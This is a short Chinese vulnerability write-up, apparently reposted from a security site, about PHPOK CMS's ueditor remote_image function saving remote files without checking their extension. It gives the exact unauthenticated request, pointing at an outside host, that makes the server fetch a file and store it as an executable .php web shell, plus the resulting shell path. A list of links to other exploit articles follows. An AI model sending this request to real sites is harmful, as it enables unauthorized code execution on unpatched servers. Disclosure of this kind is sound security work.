无任何限制，不用注册账号，不用csrf，不用注入。一个请求直接getshell。

不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明：

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明：

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php

我这里1.txt的内容是

测试问题嘛 不做破坏

shell地址直接返回了。这里不返回也没事，文件名可以自己算出来。

http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

• ·NetGain EM 7.2.647 build 941 - Authent
• ·Dup Scout Enterprise 9.7.18 - '.xml' L
• ·CVE-2017-7494：Linux版“永恒之蓝”远程
• ·Samba远程代码执行漏洞(CVE-2017-7494)分
• ·VMware Workstation for Linux 12.5.2 bu
• ·Joomla! 3.7.0 - 'com_fields' SQL Injec
• ·PlaySMs 1.4 - 'import.php' Remote Code
• ·WordPress 4.6远程代码执行漏洞（非插件
• ·Zabbix爆远程代码执行漏洞、数据库写入高
• ·Concrete5 8.1.0 - 'Host' Header Inject
• ·Microsoft Windows 10 10586 - IEETWColl
• ·Apple WebKit / Safari 10.0.2(12602.3.1
• ·VirtualBox 5.1.14 r112924 - Unprivileg
• ·AIX系统5335 5336 端口任意文件读取下载
• ·opennms java反序列化命令执行漏洞
• ·MyClassifiedScript 5.1 - SQL Injection